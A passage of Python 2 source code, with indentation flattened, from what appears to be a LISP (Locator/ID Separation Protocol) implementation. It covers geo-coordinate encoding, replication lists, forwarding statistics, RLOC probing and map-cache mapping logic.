def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html, do_formatting):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = ""
if (rle_node.rloc_name != None):
rle_name_str = rle_node.rloc_name
if (do_formatting): rle_name_str = blue(rle_name_str, html)
#endif
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
else ":" + str(port), rle_node.level,
"" if rle_node.rloc_name == None else rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string):
self.json_name = name
self.json_string = string
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
self.rloc_probe_hops = "?/?"
self.recent_rloc_probe_hops = ["?/?", "?/?", "?/?"]
self.last_rloc_probe_nonce = 0
self.echo_nonce_capable = False
self.map_notify_requested = False
self.rloc_next_hop = None
self.next_rloc = None
if (recurse == False): return
#
# This is for a box with multiple egress interfaces. We create an
# rloc chain, one for each <device, nh> tuple. So we can RLOC-probe
# individually.
#
next_hops = lisp_get_default_route_next_hops()
if (next_hops == [] or len(next_hops) == 1): return
self.rloc_next_hop = next_hops[0]
last = self
for nh in next_hops[1::]:
hop = lisp_rloc(False)
hop = copy.deepcopy(self)
hop.rloc_next_hop = nh
last.next_rloc = hop
last = hop
#endfor
#enddef
def up_state(self):
return(self.state == LISP_RLOC_UP_STATE)
#enddef
def unreach_state(self):
return(self.state == LISP_RLOC_UNREACH_STATE)
#enddef
def no_echoed_nonce_state(self):
return(self.state == LISP_RLOC_NO_ECHOED_NONCE_STATE)
#enddef
def down_state(self):
return(self.state in \
[LISP_RLOC_DOWN_STATE, LISP_RLOC_ADMIN_DOWN_STATE])
#enddef
def print_state(self):
if (self.state is LISP_RLOC_UNKNOWN_STATE):
return("unknown-state")
if (self.state is LISP_RLOC_UP_STATE):
return("up-state")
if (self.state is LISP_RLOC_DOWN_STATE):
return("down-state")
if (self.state is LISP_RLOC_ADMIN_DOWN_STATE):
return("admin-down-state")
if (self.state is LISP_RLOC_UNREACH_STATE):
return("unreach-state")
if (self.state is LISP_RLOC_NO_ECHOED_NONCE_STATE):
return("no-echoed-nonce-state")
return("invalid-state")
#enddef
def print_rloc(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}".format(indent,
red(self.rloc.print_address(), False), ts, self.print_state(),
self.priority, self.weight, self.mpriority, self.mweight))
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def store_rloc_from_record(self, rloc_record, nonce, source):
port = LISP_DATA_PORT
self.rloc.copy_address(rloc_record.rloc)
self.rloc_name = rloc_record.rloc_name
#
# Store translated port if RLOC was translated by a NAT.
#
rloc = self.rloc
if (rloc.is_null() == False):
nat_info = lisp_get_nat_info(rloc, self.rloc_name)
if (nat_info):
port = nat_info.port
head = lisp_nat_state_info[self.rloc_name][0]
addr_str = rloc.print_address_no_iid()
rloc_str = red(addr_str, False)
rloc_nstr = "" if self.rloc_name == None else \
blue(self.rloc_name, False)
#
# Don't use timed-out state. And check if the RLOC from the
# RLOC-record is different than the youngest NAT state.
#
if (nat_info.timed_out()):
lprint((" Matched stored NAT state timed out for " + \
"RLOC {}:{}, {}").format(rloc_str, port, rloc_nstr))
nat_info = None if (nat_info == head) else head
if (nat_info and nat_info.timed_out()):
port = nat_info.port
rloc_str = red(nat_info.address, False)
lprint((" Youngest stored NAT state timed out " + \
" for RLOC {}:{}, {}").format(rloc_str, port,
rloc_nstr))
nat_info = None
#endif
#endif
#
# Check to see if RLOC for map-cache is same RLOC for NAT
# state info.
#
if (nat_info):
if (nat_info.address != addr_str):
lprint("RLOC conflict, RLOC-record {}, NAT state {}". \
format(rloc_str, red(nat_info.address, False)))
self.rloc.store_address(nat_info.address)
#endif
rloc_str = red(nat_info.address, False)
port = nat_info.port
lprint(" Use NAT translated RLOC {}:{} for {}". \
format(rloc_str, port, rloc_nstr))
self.store_translated_rloc(rloc, port)
#endif
#endif
#endif
self.geo = rloc_record.geo
self.elp = rloc_record.elp
self.json = rloc_record.json
#
# RLE nodes may be behind NATs too.
#
self.rle = rloc_record.rle
if (self.rle):
for rle_node in self.rle.rle_nodes:
rloc_name = rle_node.rloc_name
nat_info = lisp_get_nat_info(rle_node.address, rloc_name)
if (nat_info == None): continue
port = nat_info.port
rloc_name_str = rloc_name
if (rloc_name_str): rloc_name_str = blue(rloc_name, False)
lprint((" Store translated encap-port {} for RLE-" + \
"node {}, rloc-name '{}'").format(port,
rle_node.address.print_address_no_iid(), rloc_name_str))
rle_node.translated_port = port
#endfor
#endif
self.priority = rloc_record.priority
self.mpriority = rloc_record.mpriority
self.weight = rloc_record.weight
self.mweight = rloc_record.mweight
if (rloc_record.reach_bit and rloc_record.local_bit and
rloc_record.probe_bit == False): self.state = LISP_RLOC_UP_STATE
#
# Store keys in RLOC lisp-crypto data structure.
#
rloc_is_source = source.is_exact_match(rloc_record.rloc) if \
source != None else None
if (rloc_record.keys != None and rloc_is_source):
key = rloc_record.keys[1]
if (key != None):
addr_str = rloc_record.rloc.print_address_no_iid() + ":" + \
str(port)
key.add_key_by_rloc(addr_str, True)
lprint(" Store encap-keys for nonce 0x{}, RLOC {}".format( \
lisp_hex_string(nonce), red(addr_str, False)))
#endif
#endif
return(port)
#enddef
def store_translated_rloc(self, rloc, port):
self.rloc.copy_address(rloc)
self.translated_rloc.copy_address(rloc)
self.translated_port = port
#enddef
def is_rloc_translated(self):
return(self.translated_rloc.is_null() == False)
#enddef
def rloc_exists(self):
if (self.rloc.is_null() == False): return(True)
if (self.rle_name or self.geo_name or self.elp_name or self.json_name):
return(False)
#endif
return(True)
#enddef
def is_rtr(self):
return((self.priority == 254 and self.mpriority == 255 and \
self.weight == 0 and self.mweight == 0))
#enddef
def print_state_change(self, new_state):
current_state = self.print_state()
string = "{} -> {}".format(current_state, new_state)
if (new_state == "up" and self.unreach_state()):
string = bold(string, False)
#endif
return(string)
#enddef
def print_rloc_probe_rtt(self):
if (self.rloc_probe_rtt == -1): return("none")
return(self.rloc_probe_rtt)
#enddef
def print_recent_rloc_probe_rtts(self):
rtts = str(self.recent_rloc_probe_rtts)
rtts = rtts.replace("-1", "?")
return(rtts)
#enddef
def compute_rloc_probe_rtt(self):
last = self.rloc_probe_rtt
self.rloc_probe_rtt = -1
if (self.last_rloc_probe_reply == None): return
if (self.last_rloc_probe == None): return
self.rloc_probe_rtt = self.last_rloc_probe_reply - self.last_rloc_probe
self.rloc_probe_rtt = round(self.rloc_probe_rtt, 3)
last_list = self.recent_rloc_probe_rtts
self.recent_rloc_probe_rtts = [last] + last_list[0:-1]
#enddef
def print_rloc_probe_hops(self):
return(self.rloc_probe_hops)
#enddef
def print_recent_rloc_probe_hops(self):
hops = str(self.recent_rloc_probe_hops)
return(hops)
#enddef
def store_rloc_probe_hops(self, to_hops, from_ttl):
if (to_hops == 0):
to_hops = "?"
elif (to_hops < LISP_RLOC_PROBE_TTL/2):
to_hops = "!"
else:
to_hops = str(LISP_RLOC_PROBE_TTL - to_hops)
#endif
if (from_ttl < LISP_RLOC_PROBE_TTL/2):
from_hops = "!"
else:
from_hops = str(LISP_RLOC_PROBE_TTL - from_ttl)
#endif
last = self.rloc_probe_hops
self.rloc_probe_hops = to_hops + "/" + from_hops
last_list = self.recent_rloc_probe_hops
self.recent_rloc_probe_hops = [last] + last_list[0:-1]
#enddef
def process_rloc_probe_reply(self, nonce, eid, group, hop_count, ttl):
rloc = self
while (True):
if (rloc.last_rloc_probe_nonce == nonce): break
rloc = rloc.next_rloc
if (rloc == None):
lprint(" No matching nonce state found for nonce 0x{}". \
format(lisp_hex_string(nonce)))
return
#endif
#endwhile
rloc.last_rloc_probe_reply = lisp_get_timestamp()
rloc.compute_rloc_probe_rtt()
state_string = rloc.print_state_change("up")
if (rloc.state != LISP_RLOC_UP_STATE):
lisp_update_rtr_updown(rloc.rloc, True)
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc): lisp_write_ipc_map_cache(True, mc)
#endif
rloc.store_rloc_probe_hops(hop_count, ttl)
probe = bold("RLOC-probe reply", False)
addr_str = rloc.rloc.print_address_no_iid()
rtt = bold(str(rloc.print_rloc_probe_rtt()), False)
p = ":{}".format(self.translated_port) if self.translated_port != 0 \
else ""
nh = ""
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
nh = ", nh {}({})".format(n, d)
#endif
e = green(lisp_print_eid_tuple(eid, group), False)
lprint((" Received {} from {}{} for {}, {}, rtt {}{}, " + \
"to-ttl/from-ttl {}").format(probe, red(addr_str, False), p, e,
state_string, rtt, nh, str(hop_count) + "/" + str(ttl)))
if (rloc.rloc_next_hop == None): return
#
# Now select better RTT next-hop.
#
rloc = None
install = None
while (True):
rloc = self if rloc == None else rloc.next_rloc
if (rloc == None): break
if (rloc.up_state() == False): continue
if (rloc.rloc_probe_rtt == -1): continue
if (install == None): install = rloc
if (rloc.rloc_probe_rtt < install.rloc_probe_rtt): install = rloc
#endwhile
if (install != None):
d, n = install.rloc_next_hop
nh = bold("nh {}({})".format(n, d), False)
lprint(" Install host-route via best {}".format(nh))
lisp_install_host_route(addr_str, None, False)
lisp_install_host_route(addr_str, n, True)
#endif
#enddef
def add_to_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False):
lisp_rloc_probe_list[addr_str] = []
#endif
if (group.is_null()): group.instance_id = 0
for r, e, g in lisp_rloc_probe_list[addr_str]:
if (e.is_exact_match(eid) and g.is_exact_match(group)):
if (r == self):
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
return
#endif
lisp_rloc_probe_list[addr_str].remove([r, e, g])
break
#endif
#endfor
lisp_rloc_probe_list[addr_str].append([self, eid, group])
#
# Copy reach/unreach state from first RLOC that the active RLOC-probing
# is run on.
#
rloc = lisp_rloc_probe_list[addr_str][0][0]
if (rloc.state == LISP_RLOC_UNREACH_STATE):
self.state = LISP_RLOC_UNREACH_STATE
self.last_state_change = lisp_get_timestamp()
#endif
#enddef
def delete_from_rloc_probe_list(self, eid, group):
addr_str = self.rloc.print_address_no_iid()
port = self.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
array = []
for entry in lisp_rloc_probe_list[addr_str]:
if (entry[0] != self): continue
if (entry[1].is_exact_match(eid) == False): continue
if (entry[2].is_exact_match(group) == False): continue
array = entry
break
#endfor
if (array == []): return
try:
lisp_rloc_probe_list[addr_str].remove(array)
if (lisp_rloc_probe_list[addr_str] == []):
lisp_rloc_probe_list.pop(addr_str)
#endif
except:
return
#endtry
#enddef
def print_rloc_probe_state(self, trailing_linefeed):
output = ""
rloc = self
while (True):
sent = rloc.last_rloc_probe
if (sent == None): sent = 0
resp = rloc.last_rloc_probe_reply
if (resp == None): resp = 0
rtt = rloc.print_rloc_probe_rtt()
s = space(4)
if (rloc.rloc_next_hop == None):
output += "RLOC-Probing:\n"
else:
d, n = rloc.rloc_next_hop
output += "RLOC-Probing for nh {}({}):\n".format(n, d)
#endif
output += ("{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + \
"received: {}, rtt {}").format(s, lisp_print_elapsed(sent),
s, lisp_print_elapsed(resp), rtt)
if (trailing_linefeed): output += "\n"
rloc = rloc.next_rloc
if (rloc == None): break
output += "\n"
#endwhile
return(output)
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
def rloc_recent_rekey(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.rloc.print_address_no_iid() + ":" + port
try:
key = lisp_crypto_keys_by_rloc_encap[addr_str][1]
if (key == None): return(False)
if (key.last_rekey == None): return(True)
return(time.time() - key.last_rekey < 1)
except:
return(False)
#endtry
#enddef
#endclass
class lisp_mapping():
def __init__(self, eid, group, rloc_set):
self.eid = eid
if (eid == ""): self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = group
if (group == ""): self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_set = rloc_set
self.best_rloc_set = []
self.build_best_rloc_set()
self.uptime = lisp_get_timestamp()
self.action = LISP_NO_ACTION
self.expires = None
self.map_cache_ttl = None
self.last_refresh_time = self.uptime
self.source_cache = None
self.map_replies_sent = 0
self.mapping_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.use_mr_name = "all"
self.use_ms_name = "all"
self.stats = lisp_stats()
self.dynamic_eids = None
self.checkpoint_entry = False
self.secondary_iid = None
self.signature_eid = False
self.gleaned = False
self.recent_sources = {}
#enddef
def print_mapping(self, eid_indent, rloc_indent):
ts = lisp_print_elapsed(self.uptime)
group = "" if self.group.is_null() else \
", group {}".format(self.group.print_prefix())
lprint("{}eid {}{}, uptime {}, {} rlocs:".format(eid_indent,
green(self.eid.print_prefix(), False), group, ts,
len(self.rloc_set)))
for rloc in self.rloc_set: rloc.print_rloc(rloc_indent)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.map_cache_ttl
if (ttl == None): return("forever")
if (ttl >= 3600):
if ((ttl % 3600) == 0):
ttl = str(ttl/3600) + " hours"
else:
ttl = str(ttl * 60) + " mins"
#endif
elif (ttl >= 60):
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def has_ttl_elapsed(self):
if (self.map_cache_ttl == None): return(False)
elapsed = time.time() - self.last_refresh_time
if (elapsed >= self.map_cache_ttl): return(True)
#
# TTL is about to elapse. We need to refresh entry if we are 90%
# close to expiring.
#
almost_ttl = self.map_cache_ttl - (self.map_cache_ttl / 10)
if (elapsed >= almost_ttl): return(True)
return(False)
#enddef
def is_active(self):
if (self.stats.last_increment == None): return(False)
elapsed = time.time() - self.stats.last_increment
return(elapsed <= 60)
#enddef
def match_eid_tuple(self, db):
if (self.eid.is_exact_match(db.eid) == False): return(False)
if (self.group.is_exact_match(db.group) == False): return(False)
return(True)
#enddef
def sort_rloc_set(self):
self.rloc_set.sort(key=operator.attrgetter('rloc.address'))
#enddef
def delete_rlocs_from_rloc_probe_list(self):
for rloc in self.best_rloc_set:
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def build_best_rloc_set(self):
old_best = self.best_rloc_set
self.best_rloc_set = []
if (self.rloc_set == None): return
#
# Get best priority for first up RLOC.
#
pr = 256
for rloc in self.rloc_set:
if (rloc.up_state()): pr = min(rloc.priority, pr)
#endif
#
# For each up RLOC with best priority, put in best-rloc for data-plane.
# For each unreachable RLOC that has better priority than the best
# computed above, we want to RLOC-probe. So put in the RLOC probe list
# and best list. We need to set the timestamp last_rloc_probe or
# lisp_process_rloc_probe_timer() will think the unreach RLOC went
# down and is waiting for an RLOC-probe reply (it will never get).
#
for rloc in self.rloc_set:
if (rloc.priority <= pr):
if (rloc.unreach_state() and rloc.last_rloc_probe == None):
rloc.last_rloc_probe = lisp_get_timestamp()
#endif
self.best_rloc_set.append(rloc)
#endif
#endfor
#
# Put RLOC in lisp.lisp_rloc_probe_list if doesn't exist. And if
# we removed the RLOC out of the best list, we need to remove
# references.
#
for rloc in old_best:
if (rloc.priority < pr): continue
rloc.delete_from_rloc_probe_list(self.eid, self.group)
#endfor
for rloc in self.best_rloc_set:
if (rloc.rloc.is_null()): continue
rloc.add_to_rloc_probe_list(self.eid, self.group)
#endfor
#enddef
def select_rloc(self, lisp_packet, ipc_socket):
packet = lisp_packet.packet
inner_version = lisp_packet.inner_version
length = len(self.best_rloc_set)
if (length == 0):
self.stats.increment(len(packet))
return([None, None, None, self.action, None, None])
#endif
ls = 4 if lisp_load_split_pings else 0
hashval = lisp_packet.hash_ports()
if (inner_version == 4):
for i in range(8+ls):
hashval = hashval ^ struct.unpack("B", packet[i+12])[0]
#endfor
elif (inner_version == 6):
for i in range(0, 32+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i+8:i+12])[0]
#endfor
hashval = (hashval >> 16) + (hashval & 0xffff)
hashval = (hashval >> 8) + (hashval & 0xff)
else:
for i in range(0, 12+ls, 4):
hashval = hashval ^ struct.unpack("I", packet[i:i+4])[0]
#endfor
#endif
if (lisp_data_plane_logging):
best = []
for r in self.best_rloc_set:
if (r.rloc.is_null()): continue
best.append([r.rloc.print_address_no_iid(), r.print_state()])
#endfor
dprint("Packet hash {}, index {}, best-rloc-list: {}".format( \
hex(hashval), hashval % length, red(str(best), False)))
#endif
#
# Get hashed value RLOC.
#
rloc = self.best_rloc_set[hashval % length]
#
# IF this RLOC is not in up state but was taken out of up state by
# not receiving echoed-nonces, try requesting again after some time.
#
echo_nonce = lisp_get_echo_nonce(rloc.rloc, None)
if (echo_nonce):
echo_nonce.change_state(rloc)
if (rloc.no_echoed_nonce_state()):
echo_nonce.request_nonce_sent = None
#endif
#endif
#
# Find a reachabile RLOC.
#
if (rloc.up_state() == False):
stop = hashval % length
index = (stop + 1) % length
while (index != stop):
rloc = self.best_rloc_set[index]
if (rloc.up_state()): break
index = (index + 1) % length
#endwhile
if (index == stop):
self.build_best_rloc_set()
return([None, None, None, None, None, None])
#endif
#endif
#
# We are going to use this RLOC. Increment statistics.
#
rloc.stats.increment(len(packet))
#
# Give RLE preference.
#
if (rloc.rle_name and rloc.rle == None):
if (lisp_rle_list.has_key(rloc.rle_name)):
rloc.rle = lisp_rle_list[rloc.rle_name]
#endif
#endif
if (rloc.rle): return([None, None, None, None, rloc.rle, None])
#
# Next check if ELP is cached for this RLOC entry.
#
if (rloc.elp and rloc.elp.use_elp_node):
return([rloc.elp.use_elp_node.address, None, None, None, None,
None])
#endif
#
# Return RLOC address.
#
rloc_addr = None if (rloc.rloc.is_null()) else rloc.rloc
port = rloc.translated_port
action = self.action if (rloc_addr == None) else None
#
# Check to see if we are requesting an nonce to be echoed, or we are
# echoing a nonce.
#
nonce = None
if (echo_nonce and echo_nonce.request_nonce_timeout() == False):
nonce = echo_nonce.get_request_or_echo_nonce(ipc_socket, rloc_addr)
#endif
#
# If no RLOC address, check for native-forward.
#
return([rloc_addr, port, nonce, action, None, rloc])
#enddef
def do_rloc_sets_match(self, rloc_address_set):
if (len(self.rloc_set) != len(rloc_address_set)): return(False)
#
# Compare an array of lisp_address()es with the lisp_mapping()
# rloc-set which is an array of lisp_rloc()s.
#
for rloc_entry in self.rloc_set:
for rloc in rloc_address_set:
if (rloc.is_exact_match(rloc_entry.rloc) == False): continue
rloc = None
break
#endfor
if (rloc == rloc_address_set[-1]): return(False)
#endfor
return(True)
#enddef
def get_rloc(self, rloc):
for rloc_entry in self.rloc_set:
r = rloc_entry.rloc
if (rloc.is_exact_match(r)): return(rloc_entry)
#endfor
return(None)
#enddef
def get_rloc_by_interface(self, interface):
for rloc_entry in self.rloc_set:
if (rloc_entry.interface == interface): return(rloc_entry)
#endfor
return(None)
#enddef
def add_db(self):
if (self.group.is_null()):
lisp_db_for_lookups.add_cache(self.eid, self)
else:
db = lisp_db_for_lookups.lookup_cache(self.group, True)
if (db == None):
db = lisp_mapping(self.group, self.group, [])
lisp_db_for_lookups.add_cache(self.group, db)
#endif
db.add_source_entry(self)
#endif
#enddef
def add_cache(self, do_ipc=True):
if (self.group.is_null()):
lisp_map_cache.add_cache(self.eid, self)
if (lisp_program_hardware): lisp_program_vxlan_hardware(self)
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None):
mc = lisp_mapping(self.group, self.group, [])
mc.eid.copy_address(self.group)
mc.group.copy_address(self.group)
lisp_map_cache.add_cache(self.group, mc)
#endif
if (self.eid.is_null()): self.eid.make_default_route(mc.group)
mc.add_source_entry(self)
#endif
if (do_ipc): lisp_write_ipc_map_cache(True, self)
#enddef
def delete_cache(self):
self.delete_rlocs_from_rloc_probe_list()
lisp_write_ipc_map_cache(False, self)
if (self.group.is_null()):
lisp_map_cache.delete_cache(self.eid)
if (lisp_program_hardware):
prefix = self.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
#endif
else:
mc = lisp_map_cache.lookup_cache(self.group, True)
if (mc == None): return
smc = mc.lookup_source_cache(self.eid, True)
if (smc == None): return
mc.source_cache.delete_cache(self.eid)
if (mc.source_cache.cache_size() == 0):
lisp_map_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_mc):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_mc.eid, source_mc)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def dynamic_eid_configured(self):
return(self.dynamic_eids != None)
#enddef
def star_secondary_iid(self, prefix):
if (self.secondary_iid == None): return(prefix)
iid = "," + str(self.secondary_iid)
return(prefix.replace(iid, iid + "*"))
#enddef
def increment_decap_stats(self, packet):
port = packet.udp_dport
if (port == LISP_DATA_PORT):
rloc = self.get_rloc(packet.outer_dest)
else:
#
# Only works with one translated RLOC.
#
for rloc in self.rloc_set:
